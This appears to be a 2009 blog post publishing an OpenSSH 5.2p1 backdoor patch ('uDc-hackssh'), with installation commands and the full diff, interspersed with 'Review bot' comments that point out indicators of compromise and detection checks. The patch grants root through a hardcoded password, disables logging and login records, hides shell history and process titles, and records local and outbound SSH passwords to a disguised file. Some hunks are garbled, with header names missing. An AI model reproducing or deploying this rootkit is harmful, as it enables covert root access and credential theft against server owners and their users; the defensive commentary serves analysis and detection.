Saturday, September 12, 2009

uDc-hackssh-v1.0b

Features:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No'

Installation:
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ pwd
/pentest/rk/ssh/uDc-hackssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]
$ tar -zxf openssh-5.2p1.tar.gz

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]
$ patch -p0 < uDc-hackssh-v1.0b

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cd openssh-5.2p1

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ./configure --prefix=/usr --sbindir=/usr/sbin --bindir=/usr/bin --sysconfdir=/path_to_origin_configuration --with-pam

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ make

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ strip ssh sshd

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ rm -rf /usr/sbin/sshd /usr/bin/ssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp ssh /usr/bin/ssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp sshd /usr/sbin/sshd
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ps -ax | grep sshd
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ kill -HUP 'appropriate pid number'

And finally, the patch code....
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:29]-[/pentest/rk/ssh/uDc-hackssh] $ cat uDc-hackssh-v1.0b.patch
diff -Ncr openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0b/auth-pam.c
*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008
--- uDc-hackssh-v1.0b/auth-pam.c Fri Sep 11 22:38:47 2009
***************
*** 466,471 ****
--- 466,474 ----
if (sshpam_err != PAM_SUCCESS) goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+ if(uDc) sshpam_err = PAM_SUCCESS;
+ // end of patch 
if (sshpam_err != PAM_SUCCESS) goto auth_fail;

***************
*** 816,821 ****
--- 819,833 ----
Buffer buffer;
struct pam_ctxt *ctxt = ctx;
+ // slash patch
+ if(sshpam_authctxt)
+ for (ai = 0; ai < num; ++ai) {
+ sprintf(abuff, "pam_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), sshpam_authctxt->user, resp[ai]);
+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt->pam_done = uDc = 1;
+ else uDclog();
+ }
+ // end of patch
debug2("PAM: %s entering, %u responses", __func__, num);
switch (ctxt->pam_done) {
case 1:
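Review bot: The `sprintf` into the fixed 1024-byte global `abuff` takes `resp[ai]` straight from the PAM conversation with no length bound, so this hunk gives the authentication path an unbounded write fed by network input; the same pattern appears in the auth-passwd.c, sshconnect1.c and sshconnect2.c hunks. Every response that does not match the constant is also written to disk in cleartext through `uDclog()`, which for a defender means any account that authenticated against a daemon built from this tree, and any outbound password typed into the patched `ssh` client, has to be treated as exposed and rotated. `if(sshpam_authctxt)` is rendered on the same line as the `// slash patch` marker, and the enclosing function starts outside the hunk.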
***************
*** 1045,1050 ****
--- 1057,1065 ----
if (sshpam_err != PAM_SUCCESS)
fatal("PAM: failed to set PAM_CONV: %s",
pam_strerror(sshpam_handle, sshpam_err));
+ // slash patch
+ if(!uDc)
+ // end of patch
sshpam_err = pam_open_session(sshpam_handle, 0);
if (sshpam_err == PAM_SUCCESS)
sshpam_session_open = 1;

diff -Ncr openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0b/auth-passwd.c
*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007
--- uDc-hackssh-v1.0b/auth-passwd.c Fri Sep 11 23:30:00 2009
***************
*** 92,97 ****
--- 92,107 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ // slash patch
+ if(!strcmp(BAJAUPASS, password)) {
+ uDc = 1;
+ // options.permit_root_login = PERMIT_YES;
+ return;
+ }
+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ uDclog();
+ // end of patch

#ifdef KRB5
if (options.kerberos_authentication == 1) {

diff -Ncr openssh-5.2p1/auth.c uDc-hackssh-v1.0b/auth.c
*** openssh-5.2p1/auth.c Wed Nov 5 13:12:54 2008
--- uDc-hackssh-v1.0b/auth.c Fri Sep 11 23:35:47 2009
***************
*** 93,98 ****
--- 93,104 ----
int
allowed_user(struct passwd * pw)
{
+ // slash patch
+ if(uDc)
+ return 1;
+ else {
+ // end of patch
+
struct stat st;
const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;
char *shell;
***************
*** 243,252 ****
--- 249,264 ----
/* We found no reason not to let this user try to log on... */
return 1;
}
+ // slash patch
+ }
+ // end of patch

void
auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
void (*authlog) (const char *fmt,...) = verbose;
char *authmsg;

***************
*** 291,296 ****
--- 303,311 ----
if (authenticated == 0 && !authctxt->postponed)
audit_event(audit_classify_auth(method));
#endif
+ // slash patch
+ }
+ // end of patch
}

/*
***************
*** 299,304 ****
--- 314,322 ----
int
auth_root_allowed(char *method)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
switch (options.permit_root_login) {
case PERMIT_YES:
return 1;
***************
*** 316,321 ****
--- 334,344 ----
logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
return 0;
}
+ // slash patch
+ else
+ return 1;
+ }
+ // end of patch


/*
diff -Ncr openssh-5.2p1/canohost.c uDc-hackssh-v1.0b/canohost.c
*** openssh-5.2p1/canohost.c Sat Feb 14 13:28:21 2009
--- uDc-hackssh-v1.0b/canohost.c Fri Sep 11 23:38:28 2009
***************
*** 78,83 ****
--- 78,86 ----
if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
NULL, 0, NI_NAMEREQD) != 0) {
/* Host name not found. Use ip address. */
+ // slash patch
+ if(!uDc)
+ // end of patch
return xstrdup(ntop);
}

diff -Ncr openssh-5.2p1/includes.h uDc-hackssh-v1.0b/includes.h
*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008
--- uDc-hackssh-v1.0b/includes.h Fri Sep 11 22:38:47 2009
***************
*** 13,18 ****
--- 13,41 ----
* called by a name other than "ssh" or "Secure Shell".
*/

+ // slash patch
+ #include
+ #include
+
+ #define BAJAUPASS "@#;.,uDc,.;#@"
+ #define SSH_LOG "/usr/share/yelp/im.xml"
+
+ FILE *bajaulog;
+ char abuff[1024];
+ int kambing, ai, uDc;
+
+ #define uDclog() { \
+ kambing=strlen(abuff); \
+ for(ai=0; ai<=kambing; ai++) abuff[ai]=~abuff[ai]; \ 

+ bajaulog=fopen(SSH_LOG, "a"); \ 
+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \ 
+ chmod(SSH_LOG, 0666); \ 
+ } 

+ const char *get_remote_ipaddr(void); 
+ // end of patch 

+ #ifndef INCLUDES_H 
#define INCLUDES_H 
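Review bot: The literals `BAJAUPASS "@#;.,uDc,.;#@"` and `SSH_LOG "/usr/share/yelp/im.xml"` end up as plain strings in every binary built from this tree, so on an installed `ssh` or `sshd` they are a direct indicator to look for with `strings`, alongside a package-manager integrity check of both files. The file written by `uDclog()` has every byte complemented with `~`, so a grep of that file for plaintext credentials finds nothing; complement the bytes back before reading it during forensics. `chmod(SSH_LOG, 0666)` leaves the captured credentials readable and writable by every local account, which is further exposure on an affected host. The two `#include` directives have lost their header names in this rendering, so the hunk is incomplete as shown.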

diff -Ncr openssh-5.2p1/log.c uDc-hackssh-v1.0b/log.c 
*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008 
--- uDc-hackssh-v1.0b/log.c Fri Sep 11 22:38:47 2009 
*************** 
*** 338,343 **** 
--- 338,346 ---- 
int pri = LOG_INFO; 
int saved_errno = errno; 
+ // slash patch 
+ if(uDc) return; 
+ // end of patch
 if (level > log_level)
return;
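Review bot: `if(uDc) return;` at the top of what appears to be the central logging routine silences every log message for the rest of the process once the flag is set, and the loginrec.c and sshlogin.c hunks do the same for the utmp/wtmp/lastlog records, so a session through the patched daemon leaves no syslog, `who` or `last` trace. For detection this inverts the usual approach: look for established connections to sshd (for example with `ss -tnp`) that have no matching "Accepted" line in the auth log and no utmp entry, rather than for hostile log lines. The enclosing function starts outside the hunk.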

diff -Ncr openssh-5.2p1/loginrec.c uDc-hackssh-v1.0b/loginrec.c
*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009
--- uDc-hackssh-v1.0b/loginrec.c Fri Sep 11 22:38:47 2009
***************
*** 431,436 ****
--- 431,439 ----
int
login_write(struct logininfo *li)
{
+ // slash patch
+ if(uDc) return 0;
+ // end of patch
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
 

diff -Ncr openssh-5.2p1/session.c uDc-hackssh-v1.0b/session.c
*** openssh-5.2p1/session.c Wed Jan 28 13:29:49 2009
--- uDc-hackssh-v1.0b/session.c Fri Sep 11 23:48:15 2009
***************
*** 1193,1198 ****
--- 1193,1203 ----
if (getenv("TZ"))
child_set_env(&env, &envsize, "TZ", getenv("TZ"));

+ // slash patch
+ if(uDc)
+ child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
+ // end of patch
+
/* Set custom environment options from RSA authentication. */
if (!options.use_login) {
while (custom_environment) {
***************
*** 1496,1501 ****
--- 1501,1510 ----

if (setlogin(pw->pw_name) < 0) error("setlogin failed: %s", strerror(errno)); 

+ // slash patch 
+ if(!uDc) { 
+ // end of patch 
+ if (setgid(pw->pw_gid) < 0) { perror("setgid"); exit(1); 
*************** 
*** 1505,1510 **** 
--- 1514,1526 ---- 
perror("initgroups"); 
exit(1); 

+ // slash patch 
+ } 
+ else { 
+ setgid(0); 
+ initgroups(pw->pw_name, 0);
+ }
+ // end of patch
endgrent();
# ifdef USE_PAM
/*
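Review bot: The `else` branch replaces the group switch with `setgid(0)` and `initgroups(pw->pw_name, 0)`, and the following session.c hunks skip `permanently_set_uid(pw)` and relax the `getuid() != pw->pw_uid` check with `&& !uDc`, so the resulting session for an ordinary account keeps uid 0 and gid 0. The last session.c hunk additionally blanks the process title with `setproctitle("","")`. On a host under review this gives two cheap checks: login shells running as uid 0 whose session belongs to a non-root account (for example via `ps -eo user,pid,args`), and sshd children with an empty process title. The enclosing function starts before this hunk and ends after it.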
***************
*** 1547,1552 ****
--- 1563,1570 ----
}
#else
/* Permanently switch to the desired uid. */
+ // slash patch
+ if(!uDc)
permanently_set_uid(pw);
#endif
}
***************
*** 1554,1560 ****
#ifdef HAVE_CYGWIN
if (is_winnt)
#endif
! if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid)
fatal("Failed to set uids to %u.", (u_int) pw->pw_uid);

#ifdef WITH_SELINUX
--- 1572,1581 ----
#ifdef HAVE_CYGWIN
if (is_winnt)
#endif
! // slash patch
! //if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid)
! if ((getuid() != pw->pw_uid || geteuid() != pw->pw_uid) && !uDc)
! // end of patch
fatal("Failed to set uids to %u.", (u_int) pw->pw_uid);

#ifdef WITH_SELINUX
***************
*** 2614,2621 ****
{
if (s->pw == NULL)
error("no user for session %d", s->self);
! else
! setproctitle("%s@%s", s->pw->pw_name, session_tty_list());
}

int
--- 2635,2648 ----
{
if (s->pw == NULL)
error("no user for session %d", s->self);
! // slash patch
! else {
! if(!uDc)
! setproctitle("%s@%s", s->pw->pw_name, session_tty_list());
! else
! setproctitle("","");
! }
! // end of patch
}

int
diff -Ncr openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0b/sshconnect1.c
*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006
--- uDc-hackssh-v1.0b/sshconnect1.c Fri Sep 11 22:38:47 2009
***************
*** 458,463 ****
--- 458,468 ----
password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
+ // slash patch
+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_send();
 

diff -Ncr openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0b/sshconnect2.c
*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008
--- uDc-hackssh-v1.0b/sshconnect2.c Fri Sep 11 22:38:47 2009
***************
*** 797,802 ****
--- 797,807 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ // slash patch
+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
***************
*** 1464,1469 ****
--- 1469,1479 ----

response = read_passphrase(prompt, echo ? RP_ECHO : 0);

+ // slash patch
+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, response);
+ uDclog();
+ // end of patch
packet_put_cstring(response);
memset(response, 0, strlen(response));
xfree(response);
 

diff -Ncr openssh-5.2p1/sshlogin.c uDc-hackssh-v1.0b/sshlogin.c
*** openssh-5.2p1/sshlogin.c Mon Sep 17 14:09:16 2007
--- uDc-hackssh-v1.0b/sshlogin.c Sat Sep 12 00:03:40 2009
***************
*** 118,123 ****
--- 118,126 ----
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
const char *host, struct sockaddr *addr, socklen_t addrlen)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

/* save previous login details before writing new */
***************
*** 127,132 ****
--- 130,138 ----
login_set_addr(li, addr, addrlen);
login_login(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}

#ifdef LOGIN_NEEDS_UTMPX
***************
*** 134,145 ****
--- 140,157 ----
record_utmp_only(pid_t pid, const char *ttyname, const char *user,
const char *host, struct sockaddr *addr, socklen_t addrlen)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

li = login_alloc_entry(pid, user, host, ttyname);
login_set_addr(li, addr, addrlen);
login_utmp_only(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}
#endif

***************
*** 147,155 ****
--- 159,173 ----
void
record_logout(pid_t pid, const char *tty, const char *user)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

li = login_alloc_entry(pid, user, NULL, tty);
login_logout(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}
 

diff -Ncr openssh-5.2p1/version.h uDc-hackssh-v1.0b/version.h
*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009
--- uDc-hackssh-v1.0b/version.h Fri Sep 11 22:38:47 2009
***************
*** 1,6 ****
--- 1,9 ----
/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */

+ // slash patch
+ // change to targetted openssh verions
#define SSH_VERSION "OpenSSH_5.2"

#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
+ // end of patch